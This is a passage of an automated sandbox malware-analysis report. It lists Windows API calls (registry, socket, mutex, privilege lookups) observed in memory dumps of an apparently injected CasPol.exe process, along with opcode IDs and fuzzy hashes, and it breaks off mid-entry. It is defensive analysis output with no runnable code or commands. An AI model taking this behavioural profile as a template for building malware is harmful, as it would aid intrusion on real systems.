                                          • Instruction ID: f467bf81301023ab380995122687071cfc5e0e4d04d1939382ba3f662d69775c
                                          • Opcode Fuzzy Hash: dd5bfa92747f7bb002359a382844a23c4e5530be245e12cf96649c5d4288d927
                                          • Instruction Fuzzy Hash: ED317075505780AFEB12CF11DC84F96FFB8EF0A314F08859AE9858B162D335E909DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileType.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE30831
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileType
                                          • String ID:
                                          • API String ID: 3081899298-0
                                          • Opcode ID: bee67539c005906f6fa6c8b329ec1398b90cfb34cc22cffbe068cee07bedbe1f
                                          • Instruction ID: b0558fc8823e949165943f855417925eeb53befd1f898682d04d0e1b17373e94
                                          • Opcode Fuzzy Hash: bee67539c005906f6fa6c8b329ec1398b90cfb34cc22cffbe068cee07bedbe1f
                                          • Instruction Fuzzy Hash: E3313A7544E3C0AFE3138B219C55B52BFB8DF47214F1A81DBE9848F1A3D269A909C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1FE305ED
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: acc6cde1abfbb899181e04d2f141ae38189b01735f7b69f1f2ec6ec4f56c4a34
                                          • Instruction ID: 65e8c5e632d9af852070e960fc6c22384d2a2ee90c0674d49a827ca763b69f1f
                                          • Opcode Fuzzy Hash: acc6cde1abfbb899181e04d2f141ae38189b01735f7b69f1f2ec6ec4f56c4a34
                                          • Instruction Fuzzy Hash: 39319071504380AFE721CF65DC44F62BFE8EF09214F08859AE9848B292D375F409CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D45A5C9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 95d8f7fe0312743921eee6e85796bea9da8a432e75f387b997c341244a7397b9
                                          • Instruction ID: 1426b26721e21f510ae20884aa11a5a831ec5bfb0900758d26288cfca26a9c3b
                                          • Opcode Fuzzy Hash: 95d8f7fe0312743921eee6e85796bea9da8a432e75f387b997c341244a7397b9
                                          • Instruction Fuzzy Hash: D331A276509384AFE7128B25DC85F67FFBCEF05210F08859AF985CB152D224A948CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EA4), ref: 1FE31DC3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          • Opcode ID: fa51149d560c4446af95e88d55a61429265163668cbe2437768b7533b417cea3
                                          • Instruction ID: 6133b782b444c2b7a2bce22e62355ea73a82099ad02f128c732f9d91f3d8509b
                                          • Opcode Fuzzy Hash: fa51149d560c4446af95e88d55a61429265163668cbe2437768b7533b417cea3
                                          • Instruction Fuzzy Hash: 7D31C172504385AFE712CF65DC45FA7FBB8EF45320F0884AAE985DF152D264E808CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • K32EnumProcessModules.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45AD86
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: EnumModulesProcess
                                          • String ID:
                                          • API String ID: 1082081703-0
                                          • Opcode ID: eca7d0438e57d07d54ff537e653d48e5e924a0a6b43727c6852355ce8aebe66d
                                          • Instruction ID: bf30c4cebcf151d568e83307449af9c539a1928c28000bc74b76f0d218ffd36e
                                          • Opcode Fuzzy Hash: eca7d0438e57d07d54ff537e653d48e5e924a0a6b43727c6852355ce8aebe66d
                                          • Instruction Fuzzy Hash: AF21A7725057C0AFE712CB60DC85F56BFB8EF06320F18859AE985DF153D225A849C771
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45A6CC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 46408007dee3152b13df864ffecf455f18ad06d9bb005a7e4666e9f9a6af148c
                                          • Instruction ID: 45cf69644fcc28fcccd086573aacfb5bada77737b123ca7ae9b489d88f429444
                                          • Opcode Fuzzy Hash: 46408007dee3152b13df864ffecf455f18ad06d9bb005a7e4666e9f9a6af148c
                                          • Instruction Fuzzy Hash: F3319375105780AFE712CB21CC85F63BFB8EF06310F18849AE985CB253D264E949CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileView
                                          • String ID:
                                          • API String ID: 3314676101-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE31CD8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateMutexW.KERNEL32(?,?), ref: 1FE32319
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID:
                                          • API String ID: 1964310414-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 1FE313B6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Enum
                                          • String ID:
                                          • API String ID: 2928410991-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • getaddrinfo.WS2_32(?,00000EA4), ref: 1FE334B3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: getaddrinfo
                                          • String ID:
                                          • API String ID: 300660673-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE31476
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 1FE32A39
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CurrentOpenUser
                                          • String ID:
                                          • API String ID: 1571386571-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32C44
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeNotifyValue
                                          • String ID:
                                          • API String ID: 3933585183-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • K32GetModuleInformation.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45AE76
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: InformationModule
                                          • String ID:
                                          • API String ID: 3425974696-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • shutdown.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32404
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: shutdown
                                          • String ID:
                                          • API String ID: 2510479042-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D45AF82
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: BaseModuleName
                                          • String ID:
                                          • API String ID: 595626670-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcessTimes.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE324DD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ProcessTimes
                                          • String ID:
                                          • API String ID: 1995159646-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenFileMappingW.KERNELBASE(?,?), ref: 1FE31F6D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileMappingOpen
                                          • String ID:
                                          • API String ID: 1680863896-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE32B45
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D45A7BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1FE305ED
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EA4), ref: 1FE31DC3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • setsockopt.WS2_32(?,?,?,?,?), ref: 1FE31A8C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID:
                                          • API String ID: 3981526788-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(?,00000EA4), ref: 1D45BF27
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D45A5C9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE32D3A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetAdaptersAddresses.IPHLPAPI(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE3364D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: AdaptersAddresses
                                          • String ID:
                                          • API String ID: 2506852604-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadFile.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE309CD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE31476
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAEventSelect.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE3288A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: EventSelect
                                          • String ID:
                                          • API String ID: 31538577-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateMutexW.KERNEL32(?,?), ref: 1FE32319
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID:
                                          • API String ID: 1964310414-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAIoctl.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE326C1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Ioctl
                                          • String ID:
                                          • API String ID: 3041054344-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RasConnectionNotificationW.RASAPI32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32963
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ConnectionNotification
                                          • String ID:
                                          • API String ID: 1402429939-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1FE3370E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Connect
                                          • String ID:
                                          • API String ID: 3144859779-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ioctlsocket.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE325C3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ioctlsocket
                                          • String ID:
                                          • API String ID: 3577187118-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE31580
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45A6CC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenFileMappingW.KERNELBASE(?,?), ref: 1FE31F6D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileMappingOpen
                                          • String ID:
                                          • API String ID: 1680863896-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45ABB8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45A378
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSASocketW.WS2_32(?,?,?,?,?), ref: 1FE319B6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Socket
                                          • String ID:
                                          • API String ID: 38366605-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FE337CE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileView
                                          • String ID:
                                          • API String ID: 3314676101-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • K32GetModuleInformation.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45AE76
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: InformationModule
                                          • String ID:
                                          • API String ID: 3425974696-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 1FE32A39
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CurrentOpenUser
                                          • String ID:
                                          • API String ID: 1571386571-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D45B3E6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: DisplayNameParse
                                          • String ID:
                                          • API String ID: 3580041360-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D45A8E2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32C44
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeNotifyValue
                                          • String ID:
                                          • API String ID: 3933585183-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE31CD8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
